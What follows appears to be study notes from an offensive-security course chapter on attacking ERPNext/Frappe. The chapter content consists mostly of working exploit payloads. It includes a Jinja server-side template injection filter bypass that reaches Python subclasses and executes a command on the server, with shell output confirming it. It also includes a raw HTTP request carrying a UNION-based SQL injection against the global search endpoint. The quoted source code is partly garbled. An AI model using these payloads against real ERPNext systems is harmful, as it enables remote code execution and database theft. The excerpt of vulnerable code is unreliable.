SSTI Payload Side Template Injection/

5.5. Discovering SSTI

  1. Identifying the Rendering Function:

    # /home/frappe/frappe-bench/apps/frappe/frappe/utils/
    def render_template(template, context, is_path=None, safe_render=True):
        from frappe import get_traceback, throw
        from jinja2 import TemplateError
        if not template:
            return ""
        if (is_path or template.startswith("templates/") or (template.endswith('.html') and '\n' not in template)):
            return get_jenv().get_template(template).render(context)
            if safe_render and ".__" in template:
                throw("Illegal template")
                return get_jenv().from_string(template).render(context)
            except TemplateError:
                throw(title="Jinja Template Error", msg="<pre>{template}</pre><pre>{tb}</pre>".format(template=template, tb=get_traceback()))
  2. Bypassing SSTI Filters:

    {% set string = "ssti" %}
    {% set class = "__class__" %}
    {% set mro = "__mro__" %}
    {% set subclasses = "__subclasses__" %}
    {% set mro_r = string|attr(class)|attr(mro) %}
    {% set subclasses_r = mro_r[1]|attr(subclasses)() %}
    {{ subclasses_r }}

5.6. Exploiting SSTI

  1. Discovering Remote Command Execution Method:

    {% set string = "ssti" %}
    {% set class = "__class__" %}
    {% set mro = "__mro__" %}
    {% set subclasses = "__subclasses__" %}
    {% set mro_r = string|attr(class)|attr(mro) %}
    {% set subclasses_r = mro_r[1]|attr(subclasses)() %}
    {{ subclasses_r[420] }}
  2. Gaining Remote Command Execution:

    {% set string = "ssti" %}
    {% set class = "__class__" %}
    {% set mro = "__mro__" %}
    {% set subclasses = "__subclasses__" %}
    {% set mro_r = string|attr(class)|attr(mro) %}
    {% set subclasses_r = mro_r[1]|attr(subclasses)() %}
    {{ subclasses_r[420](["/usr/bin/touch","/tmp/das-ist-walter"]) }}
    frappe@ubuntu:~$ ls -lh /tmp/das-ist-walter 
    -rw-rw-r-- 1 frappe frappe 0 Jan 11 10:31 das-ist-walter



### Chapter Summary

In this chapter, you should learn how to:

1. **Identify and exploit SQL Injection vulnerabilities**: Understand how to discover and exploit SQL Injection to bypass authentication and gain access to sensitive areas of the application.

2. **Discover and exploit Server-Side Template Injection (SSTI)**: Learn how to identify SSTI vulnerabilities, bypass filters, and execute arbitrary code on the server.

3. **Configure debugging environments**: Set up remote debugging for the ERPNext application using Visual Studio Code to facilitate vulnerability discovery and exploitation.

4. **Understand MVC and Metadata-driven design patterns**: Grasp the concepts of MVC and Metadata-driven patterns in the context of web applications like ERPNext.

5. **Navigate HTTP routing and whitelisted functions**: Learn how HTTP routing is implemented in Frappe/ERPNext and how to identify whitelisted functions that can be exploited.

6. **Handle MariaDB query logging**: Configure MariaDB to log queries, aiding in the identification of SQL injection points.

Here's a summary of the important points with code snippets and mermaid diagrams:

### Code Snippets

#### SQL Injection

**SQL Injection Payload:**
POST /api/method/frappe.utils.global_search.web_search HTTP/1.1
Host: erpnext:8000
Content-Type: application/x-www-form-urlencoded

cmd=frappe.utils.global_search.web_search&text=offsec&scope=offsec_scope" UNION ALL SELECT 1,2,3,4,5#

SQL Injection Query:

SELECT `doctype`, `name`, `content`, `title`, `route`
FROM `__global_search`
WHERE `published` = 1 AND `route` like "offsec_scope" UNION ALL SELECT 1,2,3,4,5#%" AND MATCH(`content`) AGAINST ('\"offsec\"' IN BOOLEAN MODE)

SSTI Exploitation

SSTI Filter Bypass:

{% set string = "ssti" %}
{% set class = "__class__" %}
{% set mro = "__mro__" %}
{% set subclasses = "__subclasses__" %}

{% set mro_r = string|attr(class)|attr(mro) %}
{% set subclasses_r = mro_r[1]|attr(subclasses)() %}
{{ subclasses_r[420](["/usr/bin/touch","/tmp/das-ist-walter"]) }}

Setting Up Remote Debugging

Installing ptvsd:

frappe@ubuntu:~$ /home/frappe/frappe-bench/env/bin/pip install ptvsd

Editing Procfile:

frappe@ubuntu:~$ cat /home/frappe/frappe-bench/Procfile
#web: bench serve --port 8000

Enabling Debugger in

import ptvsd
print("Now ready for the IDE to connect to the debugger")